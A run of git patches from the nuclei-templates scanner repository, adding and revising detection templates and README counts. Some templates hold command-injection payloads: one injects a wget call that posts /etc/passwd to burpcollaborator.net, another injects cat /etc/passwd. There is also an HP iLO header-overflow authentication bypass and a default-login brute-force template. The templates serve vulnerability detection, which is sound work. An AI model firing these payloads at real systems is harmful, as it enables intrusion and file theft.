fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 659 files**. +**68 directories, 660 files**. From fdd015042f2e00fe8c87e9c419e1b8cc626baf20 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:42:00 +0530 Subject: [PATCH 198/370] Update simple-employee-rce.yaml --- vulnerabilities/other/simple-employee-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index ea9315f3fe..68bfa3a63a 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/49596 - tags: employee,rce + tags: rce requests: - raw: From 3d3fb849065a6090d0e804175df86f184840dd56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:12:53 +0000 Subject: [PATCH 199/370] Auto Update README [Tue Mar 2 16:12:53 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 995990edc5..f939899b3b 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 94 | +| cves | 218 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 660 files**. +**68 directories, 661 files**. From 38e0a570333d750235f0af383c3ebb7c9dfb7611 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:27:43 +0000 Subject: [PATCH 200/370] Auto Update README [Tue Mar 2 16:27:43 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f939899b3b..3bee77c9e6 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 105 | exposed-panels | 94 | +| cves | 219 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 661 files**. +**68 directories, 662 files**. From a236c53d68f386d1093e61a834dc319e40e09b77 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 3 Mar 2021 00:43:48 +0700 Subject: [PATCH 201/370] Update CVE-2021-21315.yaml --- cves/2021/CVE-2021-21315.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index 472a39ab34..d638b12209 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcolaborator.net)" + - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)" matchers-condition: and matchers: @@ -22,7 +22,7 @@ requests: - type: word words: - - "wget --post-file /etc/passwd burpcolaborator.net" + - "wget --post-file /etc/passwd burpcollaborator.net" part: body condition: and From 5d3250c172674e48f97a12841b5c322fdc164555 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 3 Mar 2021 07:40:51 +0700 Subject: [PATCH 202/370] Create exposed-bzr.yaml --- exposures/configs/exposed-bzr.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposures/configs/exposed-bzr.yaml diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml new file mode 100644 index 0000000000..a931b7c200 --- /dev/null +++ b/exposures/configs/exposed-bzr.yaml @@ -0,0 +1,22 @@ +id: exposed-bzr + +info: + name: Exposed BZR Directory + author: daffainfo + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/.bzr/branch/branch.conf" + + matchers: + - type: word + words: + - "parent_location" + - "push_location" + condition: or + + - type: status + status: + - 200 From d5b8d16a2b014c857b6ddd353e2fa882761fb66c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 3 Mar 2021 08:05:30 +0700 Subject: [PATCH 203/370] Create exposed-darcs.yaml --- exposures/configs/exposed-darcs.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 exposures/configs/exposed-darcs.yaml diff --git a/exposures/configs/exposed-darcs.yaml b/exposures/configs/exposed-darcs.yaml new file mode 100644 index 0000000000..623c59a8f7 --- /dev/null +++ b/exposures/configs/exposed-darcs.yaml @@ -0,0 +1,20 @@ +id: exposed-darcs + +info: + name: Exposed Darcs Directory + author: daffainfo + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/_darcs/prefs/binaries" + + matchers: + - type: word + words: + - "Binary file regexps" + + - type: status + status: + - 200 From 463b9477007c9767e9b78587d42b43f119f563f2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 3 Mar 2021 08:19:24 +0700 Subject: [PATCH 204/370] Create exposed-bitkeeper.yaml --- exposures/configs/exposed-bitkeeper.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/configs/exposed-bitkeeper.yaml diff --git a/exposures/configs/exposed-bitkeeper.yaml b/exposures/configs/exposed-bitkeeper.yaml new file mode 100644 index 0000000000..03d1f53634 --- /dev/null +++ b/exposures/configs/exposed-bitkeeper.yaml @@ -0,0 +1,23 @@ +id: exposed-bitkeeper + +info: + name: Exposed BitKeeper Directory + author: daffainfo + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/BitKeeper/etc/config" + + matchers: + - type: word + words: + - "logging" + - "email" + - "description" + condition: and + + - type: status + status: + - 200 From 6f9c901ca7c6a8993f65326945cdc5827196eef2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Wed, 3 Mar 2021 11:58:28 +0530 Subject: [PATCH 205/370] misc updates --- cves/2021/CVE-2021-3129.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 9b4c249733..4137a0ebc4 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -1,10 +1,10 @@ id: CVE-2021-3129 info: - name: Ignition Laravel RCE + name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION author: z3bd severity: critical - description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. reference: https://www.ambionics.io/blog/laravel-debug-rce tags: cve,cve2021,laravel,rce From 70920a58d825a3195aa3f947934a0c61b7b6ef28 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 3 Mar 2021 15:01:29 +0800 Subject: [PATCH 206/370] add ilo-detect.yaml --- technologies/ilo-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/ilo-detect.yaml diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml new file mode 100644 index 0000000000..148a7645ef --- /dev/null +++ b/technologies/ilo-detect.yaml @@ -0,0 +1,19 @@ +id: ilo-detect + +info: + name: HP iLO + author: milo2012 + severity: info + description: Version of HP iLO + +requests: + - method: GET + path: + - "{{BaseURL}}/xmldata?item=all" + + extractors: + - type: regex + part: body + regex: + - "(.*)" + From 166a8b2cddd5f3a02326a701026b95765da736c9 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 3 Mar 2021 15:05:09 +0800 Subject: [PATCH 207/370] add --- technologies/ilo-detect.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 148a7645ef..f55b451afa 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -1,19 +1,15 @@ id: ilo-detect - info: name: HP iLO author: milo2012 severity: info description: Version of HP iLO - requests: - method: GET path: - "{{BaseURL}}/xmldata?item=all" - extractors: - type: regex part: body regex: - "(.*)" - From 1641af394891b89d24e31b34077c2a704665c110 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 3 Mar 2021 15:42:53 +0800 Subject: [PATCH 208/370] add CVE-2017-12542.yaml --- cves/CVE-2017-12542.yaml | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/CVE-2017-12542.yaml diff --git a/cves/CVE-2017-12542.yaml b/cves/CVE-2017-12542.yaml new file mode 100644 index 0000000000..544999fc88 --- /dev/null +++ b/cves/CVE-2017-12542.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-12637 + +info: + name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 + author: apt-mirror + severity: high + description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + tags: cve,cve2017,hp,ilo,traversal + + # References: + # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/ + # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + # - [3] https://github.com/skelsec/CVE-2017-12542 + +requests: + - raw: + - | + GET /rest/v1/AccountService/Accounts HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA + Upgrade-Insecure-Requests: 1 + matchers: + - type: word + words: + - "Items" + part: body + - method: GET + path: + - "{{BaseURL}}/xmldata?item=all" + + extractors: + - type: regex + part: body + regex: + - "(.*)" + From c714982a674d6ba75226b059c422ab40b6e94eb8 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 3 Mar 2021 15:44:28 +0800 Subject: [PATCH 209/370] add CVE-2017-12542.yaml --- cves/CVE-2017-12542.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/cves/CVE-2017-12542.yaml b/cves/CVE-2017-12542.yaml index 544999fc88..b4879edd9a 100644 --- a/cves/CVE-2017-12542.yaml +++ b/cves/CVE-2017-12542.yaml @@ -1,17 +1,14 @@ id: CVE-2017-12637 - info: name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 author: apt-mirror severity: high description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. tags: cve,cve2017,hp,ilo,traversal - # References: # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/ # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542 # - [3] https://github.com/skelsec/CVE-2017-12542 - requests: - raw: - | @@ -30,10 +27,8 @@ requests: - method: GET path: - "{{BaseURL}}/xmldata?item=all" - extractors: - type: regex part: body regex: - "(.*)" - From 20bb69d923bde6ec0e6c416fe9724c528b6d2837 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 3 Mar 2021 20:44:11 +0700 Subject: [PATCH 210/370] Create CVE-2020-21224.yaml --- cves/2020/CVE-2020-21224.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-21224.yaml diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml new file mode 100644 index 0000000000..69a079db8f --- /dev/null +++ b/cves/2020/CVE-2020-21224.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-21224 + +info: + name: ClusterEngine V4.0 RCE + author: pikpikcu + severity: critical + reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul + tags: cve,cve2020,clusterengine,rce + +requests: + - method: POST + path: + - '{{BaseURL}}/login.php' + body: "op=login&username=;`cat /etc/passwd`&password=" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From 9bc22f64bf1fa7835b4e8e860741c25d98dbefdd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 02:09:10 +0700 Subject: [PATCH 211/370] Create microsoft-echange-server-detect.yaml --- .../microsoft-echange-server-detect.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 technologies/microsoft-echange-server-detect.yaml diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml new file mode 100644 index 0000000000..5436a95fff --- /dev/null +++ b/technologies/microsoft-echange-server-detect.yaml @@ -0,0 +1,34 @@ +id: microsoft-echange-server-detect + +info: + name: Microsoft Exchange Server Detect + author: pikpikcu + severity: info + reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse + description: | + Check for Issues Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + +requests: + - method: GET + path: + - "{{BaseURL}}/owa/" + - "{{BaseURL}}/owa/auth/logon.aspx" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - 302 + - type: regex + regex: + - "X-Owa-Version: (15.2.720|15.1.2106|15.0.1496|14.0.496|14.3.513)" + - "Location: " + part: header + + extractors: + - type: kval + part: header + kval: + - X-Owa-Version + - Location From aabd1ed2f75ab4d49f99f99f6f9b13e250d90d1b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 4 Mar 2021 01:56:35 +0530 Subject: [PATCH 212/370] Update CVE-2020-21224.yaml --- cves/2020/CVE-2020-21224.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index 69a079db8f..717ea1fd0d 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml @@ -1,7 +1,7 @@ id: CVE-2020-21224 info: - name: ClusterEngine V4.0 RCE + name: Inspur ClusterEngine V4.0 RCE author: pikpikcu severity: critical reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul @@ -23,4 +23,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From e867e684469ae17697a4e718cd142604015ed53d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Mar 2021 20:28:32 +0000 Subject: [PATCH 213/370] Auto Update README [Wed Mar 3 20:28:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3bee77c9e6..5c04c3b8f9 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 219 | vulnerabilities | 105 | exposed-panels | 94 | +| cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 662 files**. +**68 directories, 663 files**. From 6e5d9edaed130543bd96df17b9f958ce19bbfa3d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 4 Mar 2021 05:58:37 +0700 Subject: [PATCH 214/370] Update phpinfo.yaml --- exposures/configs/phpinfo.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 1dd783b000..8675a8fe21 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -2,7 +2,7 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pd-team + author: pd-team & daffainfo severity: low requests: @@ -23,6 +23,10 @@ requests: - "{{BaseURL}}/temp.php" - "{{BaseURL}}/PHPInfo.php" - "{{BaseURL}}/old_phpinfo.php" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/infos.php" + - "{{BaseURL}}/linusadmin-phpinfo.php" + - "{{BaseURL}}/php-info.php" matchers: - type: word words: From 93a4294a5062a864dab1c75102b97e09cea2061f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 12:15:16 +0700 Subject: [PATCH 215/370] Update microsoft-echange-server-detect.yaml --- technologies/microsoft-echange-server-detect.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml index 5436a95fff..05a88b55a3 100644 --- a/technologies/microsoft-echange-server-detect.yaml +++ b/technologies/microsoft-echange-server-detect.yaml @@ -6,12 +6,11 @@ info: severity: info reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse description: | - Check for Issues Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. - + Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + requests: - method: GET path: - - "{{BaseURL}}/owa/" - "{{BaseURL}}/owa/auth/logon.aspx" matchers-condition: and @@ -19,16 +18,14 @@ requests: - type: status status: - 200 - - 302 + - type: regex regex: - - "X-Owa-Version: (15.2.720|15.1.2106|15.0.1496|14.0.496|14.3.513)" - - "Location: " - part: header + - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" + part: all extractors: - type: kval part: header kval: - X-Owa-Version - - Location From 6dbb855e62c30f1d693ff1973d61211de01741c2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 13:34:30 +0530 Subject: [PATCH 216/370] payload update --- default-logins/apache/tomcat-manager-default.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml index 9baec5b68e..6e874092cb 100644 --- a/default-logins/apache/tomcat-manager-default.yaml +++ b/default-logins/apache/tomcat-manager-default.yaml @@ -44,7 +44,7 @@ requests: - j5Brn9 - tomcat - attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb raw: # Request with simple param and header manipulation with DSL functions From de7c175c56e87f9b021a468cfa57accd6d178576 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:37:12 +0530 Subject: [PATCH 217/370] removing duplicates --- exposures/configs/phpinfo.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 8675a8fe21..e49e256cce 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -21,9 +21,7 @@ requests: - "{{BaseURL}}/time.php" - "{{BaseURL}}/index.php" - "{{BaseURL}}/temp.php" - - "{{BaseURL}}/PHPInfo.php" - "{{BaseURL}}/old_phpinfo.php" - - "{{BaseURL}}/index.php" - "{{BaseURL}}/infos.php" - "{{BaseURL}}/linusadmin-phpinfo.php" - "{{BaseURL}}/php-info.php" From 0089e398745eddbbee49336d5dd60e6c6906997f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:42:05 +0530 Subject: [PATCH 218/370] Improving matchers --- exposures/configs/exposed-bzr.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml index a931b7c200..743b51acdb 100644 --- a/exposures/configs/exposed-bzr.yaml +++ b/exposures/configs/exposed-bzr.yaml @@ -10,12 +10,13 @@ requests: path: - "{{BaseURL}}/.bzr/branch/branch.conf" + matchers-condition: and matchers: - type: word words: - "parent_location" - "push_location" - condition: or + condition: and - type: status status: From 383d9a160ca54b6b4d51faedbd3bf6ce3d1c21a7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:44:24 +0530 Subject: [PATCH 219/370] Adding reference --- exposures/configs/exposed-bzr.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml index 743b51acdb..90396575a7 100644 --- a/exposures/configs/exposed-bzr.yaml +++ b/exposures/configs/exposed-bzr.yaml @@ -4,6 +4,7 @@ info: name: Exposed BZR Directory author: daffainfo severity: low + reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html requests: - method: GET From b1bdd78aa1aee8f43165d92a9d1d32011f0062b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 11:17:40 +0000 Subject: [PATCH 220/370] Auto Update README [Thu Mar 4 11:17:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5c04c3b8f9..88f26f1cc3 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 56 | technologies | 48 | misconfiguration | 50 | +| exposures | 57 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 663 files**. +**68 directories, 664 files**. From 82d6f9d370d121397c778e0bc50c9310da2a212f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:50:18 +0530 Subject: [PATCH 221/370] improved matcher --- exposures/configs/exposed-bitkeeper.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/exposed-bitkeeper.yaml b/exposures/configs/exposed-bitkeeper.yaml index 03d1f53634..2ad1fcc9bb 100644 --- a/exposures/configs/exposed-bitkeeper.yaml +++ b/exposures/configs/exposed-bitkeeper.yaml @@ -4,12 +4,14 @@ info: name: Exposed BitKeeper Directory author: daffainfo severity: low + reference: https://www.bitkeeper.org/man/config-etc.html requests: - method: GET path: - "{{BaseURL}}/BitKeeper/etc/config" + matchers-condition: and matchers: - type: word words: From f21e326d6252243b56f04306661f0049dc42ecce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 11:21:15 +0000 Subject: [PATCH 222/370] Auto Update README [Thu Mar 4 11:21:15 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 88f26f1cc3..8740e8b79d 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 57 | technologies | 48 | misconfiguration | 50 | +| exposures | 58 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 664 files**. +**68 directories, 665 files**. From c3ead4494ee18feee65a1677cd787b0383330d78 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:54:34 +0530 Subject: [PATCH 223/370] Update exposed-darcs.yaml --- exposures/configs/exposed-darcs.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/configs/exposed-darcs.yaml b/exposures/configs/exposed-darcs.yaml index 623c59a8f7..49cd676300 100644 --- a/exposures/configs/exposed-darcs.yaml +++ b/exposures/configs/exposed-darcs.yaml @@ -1,15 +1,17 @@ id: exposed-darcs info: - name: Exposed Darcs Directory + name: Exposed Darcs Config author: daffainfo severity: low + reference: http://darcs.net/Using/Configuration#sources requests: - method: GET path: - "{{BaseURL}}/_darcs/prefs/binaries" + matchers-condition: and matchers: - type: word words: From 5bcf45bbf66af0b3340d1dd9f0e26be38756cee1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 11:25:26 +0000 Subject: [PATCH 224/370] Auto Update README [Thu Mar 4 11:25:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8740e8b79d..7714c90ada 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 58 | technologies | 48 | misconfiguration | 50 | +| exposures | 59 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 665 files**. +**68 directories, 666 files**. From b56eda03ba825da81fa88cf4ec5f4ff684f17ceb Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 17:06:46 +0530 Subject: [PATCH 225/370] wip fix --- cves/{ => 2017}/CVE-2017-12542.yaml | 7 +++++-- technologies/ilo-detect.yaml | 8 ++++++++ 2 files changed, 13 insertions(+), 2 deletions(-) rename cves/{ => 2017}/CVE-2017-12542.yaml (88%) diff --git a/cves/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml similarity index 88% rename from cves/CVE-2017-12542.yaml rename to cves/2017/CVE-2017-12542.yaml index b4879edd9a..63cf3ce77a 100644 --- a/cves/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -1,10 +1,12 @@ -id: CVE-2017-12637 +id: CVE-2017-12542 info: name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 author: apt-mirror severity: high description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + reference: https://www.synacktiv.com/en/publications/rce-vulnerability-in-hp-ilo.html tags: cve,cve2017,hp,ilo,traversal + # References: # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/ # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542 @@ -15,7 +17,7 @@ requests: GET /rest/v1/AccountService/Accounts HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA Upgrade-Insecure-Requests: 1 @@ -24,6 +26,7 @@ requests: words: - "Items" part: body + - method: GET path: - "{{BaseURL}}/xmldata?item=all" diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index f55b451afa..6743892663 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -1,13 +1,21 @@ id: ilo-detect + info: name: HP iLO author: milo2012 severity: info description: Version of HP iLO + requests: - method: GET path: - "{{BaseURL}}/xmldata?item=all" + + matchers: + - type: status + status: + - 200 + extractors: - type: regex part: body From d66564f69908e76f52669547ce17d59fb5d53405 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 4 Mar 2021 13:34:40 +0000 Subject: [PATCH 226/370] hmc --- exposed-panels/hmc-hybris-panel.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 exposed-panels/hmc-hybris-panel.yaml diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml new file mode 100644 index 0000000000..eb60e52f28 --- /dev/null +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -0,0 +1,17 @@ +id: 